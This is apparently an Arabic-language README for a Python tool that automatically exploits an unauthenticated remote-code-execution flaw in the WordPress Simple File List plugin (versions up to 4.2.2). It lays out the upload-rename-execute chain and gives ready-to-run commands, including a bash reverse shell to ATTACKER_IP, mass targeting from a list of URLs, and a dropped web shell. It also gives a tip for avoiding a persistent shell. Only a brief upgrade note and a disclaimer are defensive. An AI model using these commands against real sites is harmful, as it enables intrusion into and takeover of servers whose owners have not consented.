
استغلال لـ CVE-2025-34085
أداة استغلال آلية لـ CVE-2025-34085 (مكررة لـ CVE-2020-36847)، وهي ثغرة حرجة لتنفيذ التعليمات البرمجية عن بُعد غير مصادق عليها في إضافة WordPress Simple File List الإصدارات ≤ 4.2.2.
ملاحظة: تم رفض CVE-2025-34085 من قبل MITRE باعتبارها مكررة لـ CVE-2020-36847. الثغرة حقيقية وتم إصلاحها في الإصدار 4.2.3. يشير كلا المعرفين إلى نفس المشكلة الأساسية.
| الحقل | التفاصيل |
|---|
| CVE | CVE-2025-34085 / CVE-2020-36847 |
| الإضافة | Simple File List |
| الإصدارات المتأثرة | ≤ 4.2.2 |
| الإصدار المُصلح | 4.2.3 |
| النوع | رفع ملف غير مقيد → تجاوز إعادة التسمية → RCE |
| CVSS | 9.8 (حرجة) |
| المصادقة | لا حاجة للمصادقة |
| الاكتشاف الأصلي | coiffeur |
| وحدة Metasploit | exploit/multi/http/wp_simple_file_list_rce |
الرفع — يتم رفع حمولة PHP مقنعة كملف .png عبر نقطة رفع الإضافة (ee-upload-engine.php). يتحقق محرك الرفع من الامتدادات لكنه يقبل ملفات الصور.
إعادة التسمية — وظيفة إعادة التسمية في الإضافة (ee-file-engine.php) لا تفرض قيودًا على الامتدادات. يقوم المهاجم بإعادة تسمية الملف .png إلى .php (أو .phtml، .php5، .php3).
التنفيذ — يصبح ملف PHP المعاد تسميته متاحًا وقابلاً للتنفيذ في دليل التحميلات في /wp-content/uploads/simple-file-list/، مما يمنح المهاجم القدرة على تنفيذ أوامر عشوائية.
pip install requests colorama
بايثون 3.6+
python3 CVE-2025-34085.py -u http://target.com --cmd "id"
?cmd=)python3 CVE-2025-34085.py -u http://target.com --cmd "bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'" --inline
أنشئ ملف targets.txt يحتوي على رابط واحد في كل سطر:
http://target1.com
http://target2.com
https://target3.com
python3 CVE-2025-34085.py --cmd "id"
| الوسيطة | الوصف | الافتراضي |
|---|---|---|
-u, --url | رابط هدف واحد | — |
--cmd | الأمر المراد تنفيذه على الهدف | id |
--inline | حقن الأمر مباشرة في شل PHP (مضمن، لا يوجد شل ويب ?cmd=) | False |
نصيحة: استخدم
--inlineعندما تحتاج إلى شل عكسي أو عندما يحتوي الهدف على تصفية لمعاملات الاستعلام. بدون--inline، تقوم الأداة بإسقاط شل ويب يقبل الأوامر عبر?cmd=.
يتم تسجيل الاستغلالات الناجحة في vuln.txt:
http://target.com | http://target.com/wp-content/uploads/simple-file-list/shell.php | uid=33(www-data) gid=33(www-data)
/wp-content/uploads/simple-file-list/<random>.phpvuln.txt — مفيد لتقريرك.--inline مع شل عكسي لتجنب ترك شل ويب دائم بـ ?cmd=.قم بترقية إضافة Simple File List إلى الإصدار 4.2.3 أو أحدث.
هذه الأداة مخصصة لاختبار الاختراق المصرح به والأغراض التعليمية فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. احرص دائمًا على الحصول على التصريح المناسب قبل الاختبار.